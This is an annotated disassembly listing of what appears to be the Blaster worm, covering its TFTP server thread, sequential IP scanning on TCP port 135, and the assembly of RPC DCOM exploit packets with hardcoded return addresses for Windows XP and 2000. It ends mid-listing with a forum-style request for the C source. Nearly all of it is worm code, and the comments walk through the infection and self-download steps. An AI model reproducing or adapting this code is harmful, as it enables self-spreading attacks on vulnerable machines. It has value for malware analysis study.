.text:004016CE pop ecx
.text:004016CF xor esi, esi
.text:004016D1 jmp short loc_4016D8
.text:004016D3 ; ---------------------------------------------------------------------------
.text:004016D3
.text:004016D3 loc_4016D3: ; CODE XREF: TFTPServerThread+150^j
.text:004016D3 jmp loc_40164C
.text:004016D8 ; ---------------------------------------------------------------------------
.text:004016D8
.text:004016D8 loc_4016D8: ; CODE XREF: TFTPServerThread+13E^j
.text:004016D8 ; TFTPServerThread+15B^j
.text:004016D8 or esi, esi
.text:004016DA jz short loc_4016EA
.text:004016DC push esi
.text:004016DD call fclose
.text:004016E2 pop ecx
.text:004016E3 jmp short loc_4016EA
.text:004016E5 ; ---------------------------------------------------------------------------
.text:004016E5 jmp loc_40158C
.text:004016EA ; ---------------------------------------------------------------------------
.text:004016EA
.text:004016EA loc_4016EA: ; CODE XREF: TFTPServerThread+29^j
.text:004016EA ; TFTPServerThread+78^j ...
.text:004016EA and dwTFTPInProgress, 0
.text:004016F1 push ds:s ; s
.text:004016F7 call closesocket
.text:004016FC push 0 ; dwExitCode
.text:004016FE call ExitThread
.text:00401703 xor eax, eax
.text:00401705 pop edi
.text:00401706 pop esi
.text:00401707 pop ebx
.text:00401708 leave
.text:00401709 retn 4
.text:00401709 TFTPServerThread endp
.text:00401709
.text:0040170C
.text:0040170C ; =============== S U B R O U T I N E =======================================
.text:0040170C
.text:0040170C
.text:0040170C incrementOctets proc near ; CODE XREF: incrementOctets+68vj
.text:0040170C ; infect20Hosts+6Fvp
.text:0040170C cmp ds:octet4, 0FEh
.text:00401716 jle short loc_401727 ; increment 4th octet and stop if in range [0-254]
.text:00401718 and ds:octet4, 0 ; 4th octet rolls over to 0; increment 3rd octet
.text:0040171F inc ds:octet3
.text:00401725 jmp short loc_40172F ; stop if octet3 is now in range [0-254]
.text:00401727 ; ---------------------------------------------------------------------------
.text:00401727
.text:00401727 loc_401727: ; CODE XREF: incrementOctets+A^j
.text:00401727 inc ds:octet4 ; increment 4th octet and stop if in range [0-254]
.text:0040172D jmp short locret_401776 ; return
.text:0040172F ; ---------------------------------------------------------------------------
.text:0040172F
.text:0040172F loc_40172F: ; CODE XREF: incrementOctets+19^j
.text:0040172F cmp ds:octet3, 0FEh ; stop if octet3 is now in range [0-254]
.text:00401739 jle short locret_401776 ; return
.text:0040173B and ds:octet3, 0 ; 3rd octet rolls over to 0; increment 2nd octet
.text:00401742 inc ds:octet2
.text:00401748 cmp ds:octet2, 0FEh ; stop if octet2 is now in range [0-254]
.text:00401752 jle short locret_401776 ; return
.text:00401754 and ds:octet2, 0 ; 2nd octet rolls over to 0; increment 1st octet
.text:0040175B inc ds:octet1
.text:00401761 cmp ds:octet1, 0FEh ; keep 1st octet if now in range [0-254];
.text:0040176B jle short loc_401774 ; increment 4th octet again so addr is never x.0.0.0
.text:0040176D and ds:octet1, 0 ; otherwise, 1st octet rolls over to 0
.text:00401774
.text:00401774 loc_401774: ; CODE XREF: incrementOctets+5F^j
.text:00401774 jmp short incrementOctets ; increment 4th octet again so addr is never x.0.0.0
.text:00401776 ; ---------------------------------------------------------------------------
.text:00401776
.text:00401776 locret_401776: ; CODE XREF: incrementOctets+21^j
.text:00401776 ; incrementOctets+2D^j ...
.text:00401776 retn ; return
.text:00401776 incrementOctets endp
.text:00401776
.text:00401777
.text:00401777 ; =============== S U B R O U T I N E =======================================
.text:00401777
.text:00401777 ; Attributes: bp-based frame
.text:00401777
.text:00401777 infect20Hosts proc near ; CODE XREF: WinMain+312^p
.text:00401777
.text:00401777 var_18C = dword ptr -18Ch
.text:00401777 writefds = fd_set ptr -188h
.text:00401777 var_84 = byte ptr -84h
.text:00401777 in = in_addr ptr -80h
.text:00401777 namelen = dword ptr -74h
.text:00401777 argp = dword ptr -70h
.text:00401777 name = sockaddr ptr -6Ch
.text:00401777 timeout = timeval ptr -5Ch
.text:00401777 var_54 = dword ptr -54h
.text:00401777 s = dword ptr -50h
.text:00401777
.text:00401777 push ebp
.text:00401778 mov ebp, esp
.text:0040177A sub esp, 18Ch
.text:00401780 push ebx
.text:00401781 push esi
.text:00401782 push edi
.text:00401783 mov [ebp+argp], 1 ; set argp for ioctlsocket() to 1 (on)
.text:0040178A push 10h
.text:0040178C push 0
.text:0040178E lea eax, [ebp+name]
.text:00401791 push eax
.text:00401792 call memset
.text:00401797 add esp, 0Ch
.text:0040179A mov [ebp+name.sa_family], 2 ; AF_INET
.text:004017A0 push 87h ; hostshort = port TCP/135
.text:004017A5 call htons
.text:004017AA mov esi, eax
.text:004017AC mov word ptr [ebp+name.sa_data], si
.text:004017B0 xor edi, edi
.text:004017B2
.text:004017B2 Create 20 non-blocking TCP/IP sockets
.text:004017B2
.text:004017B2 loc_4017B2: ; CODE XREF: infect20Hosts+6Bvj
.text:004017B2 push 0 ; protocol = IPPROTO_IP
.text:004017B4 push 1 ; type = SOCK_STREAM
.text:004017B6 push 2 ; af = AF_INET
.text:004017B8 call socket
.text:004017BD mov [ebp+edi*4+s], eax
.text:004017C1 cmp [ebp+edi*4+s], 0FFFFFFFFh
.text:004017C6 jz loc_401924 ; return
.text:004017CC lea eax, [ebp+argp]
.text:004017CF push eax ; argp = 1 (on)
.text:004017D0 push 8004667Eh ; cmd = FIONBIO
.text:004017D5 push [ebp+edi*4+s] ; s[EDI]
.text:004017D9 call ioctlsocket
.text:004017DE inc edi
.text:004017DF cmp edi, 14h
.text:004017E2 jl short loc_4017B2 ; loop 20 times
.text:004017E4 xor edi, edi
.text:004017E6
.text:004017E6 Try to connect sockets to port TCP/135 on 20 sequential IP addresses
.text:004017E6
.text:004017E6 loc_4017E6: ; CODE XREF: infect20Hosts+CDvj
.text:004017E6 call incrementOctets ; connect loop -- executed 20 times
.text:004017EB push ds:octet4
.text:004017F1 push ds:octet3
.text:004017F7 push ds:octet2
.text:004017FD push ds:octet1
.text:00401803 push offset aI_I_I_I ; "%i.%i.%i.%i"
.text:00401808 push offset cp
.text:0040180D call sprintf ; convert four octets into a string
.text:00401812 add esp, 18h
.text:00401815 push offset cp ; cp
.text:0040181A call inet_addr ; now convert string into DWORD
.text:0040181F mov [ebp+var_54], eax
.text:00401822 cmp eax, 0FFFFFFFFh
.text:00401825 jz loc_401924 ; return
.text:0040182B mov eax, [ebp+var_54]
.text:0040182E mov dword ptr [ebp+name.sa_data+2], eax
.text:00401831 push 10h ; namelen
.text:00401833 lea eax, [ebp+name]
.text:00401836 push eax ; name
.text:00401837 push [ebp+edi*4+s] ; s[EDI]
.text:0040183B call connect
.text:00401840 inc edi
.text:00401841 cmp edi, 14h
.text:00401844 jl short loc_4017E6 ; connect loop -- executed 20 times
.text:00401846 push 708h ; dwMilliseconds
.text:0040184B call Sleep ; wait 1.8 seconds
.text:00401850 xor edi, edi
.text:00401852
.text:00401852 Look for connected sockets by doing a select() on each s[EDI] (EDI=0..19)
.text:00401852
.text:00401852 loc_401852: ; CODE XREF: infect20Hosts+1A7vj
.text:00401852 and [ebp+timeout.tv_sec], 0
.text:00401856 and [ebp+timeout.tv_usec], 0 ; zero out timeval struct
.text:00401856 ; (timeout of 0 = return instantly)
.text:0040185A and [ebp+writefds.fd_count], 0 ; FD_ZERO(&writefds)
.text:00401861
.text:00401861 --- start of FD_SET macro code
.text:00401861
.text:00401861 and [ebp+var_18C], 0 ; FD_SET(s[EDI], &writefds)
.text:00401868 jmp short loc_401883
.text:0040186A ; ---------------------------------------------------------------------------
.text:0040186A
.text:0040186A loc_40186A: ; CODE XREF: infect20Hosts+118vj
.text:0040186A mov esi, [ebp+var_18C]
.text:00401870 mov ebx, [ebp+edi*4+s] ; EDI = index into s[] socket array
.text:00401870 ; EBX = socket s[EDI]
.text:00401874 cmp [ebp+esi*4+writefds.fd_array], ebx
.text:0040187B jz short loc_401891
.text:0040187D inc [ebp+var_18C]
.text:00401883
.text:00401883 loc_401883: ; CODE XREF: infect20Hosts+F1^j
.text:00401883 mov eax, [ebp+writefds.fd_count]
.text:00401889 cmp [ebp+var_18C], eax
.text:0040188F jb short loc_40186A
.text:00401891
.text:00401891 loc_401891: ; CODE XREF: infect20Hosts+104^j
.text:00401891 mov eax, [ebp+writefds.fd_count]
.text:00401897 cmp [ebp+var_18C], eax
.text:0040189D jnz short loc_4018BB
.text:0040189F cmp eax, 40h
.text:004018A2 jnb short loc_4018BB
.text:004018A4 mov esi, [ebp+var_18C]
.text:004018AA mov ebx, [ebp+edi*4+s]
.text:004018AE mov [ebp+esi*4+writefds.fd_array], ebx
.text:004018B5 inc [ebp+writefds.fd_count]
.text:004018B5
.text:004018B5 --- end of FD_SET macro code
.text:004018BB
.text:004018BB loc_4018BB: ; CODE XREF: infect20Hosts+126^j
.text:004018BB ; infect20Hosts+12B^j
.text:004018BB lea eax, [ebp+timeout]
.text:004018BE push eax ; timeout
.text:004018BF push 0 ; exceptfds
.text:004018C1 lea eax, [ebp+writefds]
.text:004018C7 push eax ; writefds
.text:004018C8 push 0 ; readfds
.text:004018CA push 0 ; nfds
.text:004018CC call select ; writefds will be list of connected sockets
.text:004018D1 cmp eax, 1
.text:004018D4 jge short loc_4018E1 ; did select() succeed?
.text:004018D6 push [ebp+edi*4+s] ; s
.text:004018DA call closesocket ; close socket s[EDI] if select() failed
.text:004018DF jmp short loc_40191A ; advance to next iteration of loop
.text:004018E1 ; ---------------------------------------------------------------------------
.text:004018E1
.text:004018E1 loc_4018E1: ; CODE XREF: infect20Hosts+15D^j
.text:004018E1 mov [ebp+namelen], 10h
.text:004018E8 lea eax, [ebp+namelen]
.text:004018EB push eax ; namelen
.text:004018EC lea eax, [ebp+var_84]
.text:004018F2 push eax ; name
.text:004018F3 push [ebp+edi*4+s] ; s
.text:004018F7 call getpeername
.text:004018FC push dword ptr [ebp+in.S_un] ; in
.text:004018FF call inet_ntoa
.text:00401904 push eax ; szIPAddr: string representation of IP address to infect
.text:00401905 push [ebp+edi*4+s] ; s: socket connected to remote TCP/135
.text:00401909 call infectTarget ; infect a single host by sending command
.text:00401909 ; shell exploit and issuing command to
.text:00401909 ; download worm executable via TFTP
.text:0040190E add esp, 8
.text:00401911 push [ebp+edi*4+s] ; s
.text:00401915 call closesocket ; close TCP/135 socket
.text:0040191A
.text:0040191A loc_40191A: ; CODE XREF: infect20Hosts+168^j
.text:0040191A inc edi
.text:0040191B cmp edi, 14h
.text:0040191E jl loc_401852 ; check each of the 20 sockets in array for connection
.text:00401924
.text:00401924 loc_401924: ; CODE XREF: infect20Hosts+4F^j
.text:00401924 ; infect20Hosts+AE^j
.text:00401924 pop edi ; return
.text:00401925 pop esi
.text:00401926 pop ebx
.text:00401927 leave
.text:00401928 retn
.text:00401928 infect20Hosts endp
.text:00401928
.text:00401929
.text:00401929 ; =============== S U B R O U T I N E =======================================
.text:00401929
.text:00401929 ; Attributes: bp-based frame
.text:00401929
.text:00401929 ; int __cdecl infectTarget(SOCKET s,char *szIPAddr)
.text:00401929 infectTarget proc near ; CODE XREF: infect20Hosts+192^p
.text:00401929
.text:00401929 ThreadId = dword ptr -1934h
.text:00401929 var_1930 = dword ptr -1930h
.text:00401929 namelen = dword ptr -192Ch
.text:00401929 var_1928 = byte ptr -1928h
.text:00401929 var_18F8 = byte ptr -18F8h
.text:00401929 var_18BC = byte ptr -18BCh
.text:00401929 buf = byte ptr -155Ch
.text:00401929 var_1514 = dword ptr -1514h
.text:00401929 argp = dword ptr -1510h
.text:00401929 var_150C = byte ptr -150Ch
.text:00401929 var_14E8 = byte ptr -14E8h
.text:00401929 hObject = dword ptr -1240h
.text:00401929 var_123C = dword ptr -123Ch
.text:00401929 name = sockaddr ptr -1238h
.text:00401929 var_1228 = byte ptr -1228h
.text:00401929 var_1224 = byte ptr -1224h
.text:00401929 var_1223 = byte ptr -1223h
.text:00401929 var_1222 = byte ptr -1222h
.text:00401929 var_1221 = byte ptr -1221h
.text:00401929 var_1218 = dword ptr -1218h
.text:00401929 var_1210 = dword ptr -1210h
.text:00401929 var_1208 = dword ptr -1208h
.text:00401929 var_1204 = byte ptr -1204h
.text:00401929 len = dword ptr -1004h
.text:00401929 var_1000 = byte ptr -1000h
.text:00401929 var_FF8 = dword ptr -0FF8h
.text:00401929 var_FF0 = dword ptr -0FF0h
.text:00401929 var_F80 = dword ptr -0F80h
.text:00401929 var_F7C = dword ptr -0F7Ch
.text:00401929 var_F4C = dword ptr -0F4Ch
.text:00401929 var_F48 = dword ptr -0F48h
.text:00401929 var_F30 = dword ptr -0F30h
.text:00401929 var_E74 = dword ptr -0E74h
.text:00401929 s = dword ptr 8
.text:00401929 szIPAddr = dword ptr 0Ch
.text:00401929
.text:00401929 push ebp ; flags
.text:0040192A mov ebp, esp
.text:0040192C mov eax, 2934h
.text:00401931 call allocstackspace ; used when > 4KB stack space needed
.text:00401936 push ebx ; len
.text:00401937 push esi ; buf
.text:00401938 push edi ; s
.text:00401939 and [ebp+argp], 0 ; set argp for ioctlsocket() to 0 (off)
.text:00401940 lea eax, [ebp+argp]
.text:00401946 push eax ; argp = 0 (off)
.text:00401947 push 8004667Eh ; cmd = FIONBIO
.text:0040194C push [ebp+s] ; s
.text:0040194F call ioctlsocket ; make sure socket does blocking I/O
.text:00401954 cmp ds:dwWhichRetAddr, 1 ; 80% chance set to 1 (XP), 20% set to 2 (2000)
.text:0040195B jnz short loc_401969 ; 2000 "universal" return address (20% probability)
.text:0040195B ; 0018759Fh is a "CALL EBX" in unicode.nls
.text:0040195D
.text:0040195D Assemble RPC DCOM exploit packets
.text:0040195D
.text:0040195D mov [ebp+var_1514], 100139Dh ; XP "universal" return address (80% probability)
.text:0040195D ; 0100139Dh is a "CALL EBX" in svchost.exe
.text:00401967 jmp short loc_401973
.text:00401969 ; ---------------------------------------------------------------------------
.text:00401969
.text:00401969 loc_401969: ; CODE XREF: infectTarget+32^j
.text:00401969 mov [ebp+var_1514], 18759Fh ; 2000 "universal" return address (20% probability)
.text:00401969 ; 0018759Fh is a "CALL EBX" in unicode.nls
.text:00401973
.text:00401973 loc_401973: ; CODE XREF: infectTarget+3E^j
.text:00401973 lea edi, [ebp+buf]
.text:00401979 lea esi, ds:4040C0h ; bindstr[]
.text:0040197F mov ecx, 12h ; size = 0048h (72)
.text:00401984 rep movsd
.text:00401986 lea edi, [ebp+var_18BC]
.text:0040198C lea esi, ds:404108h ; request1[]
.t

asm code hein? does anyone have the c source?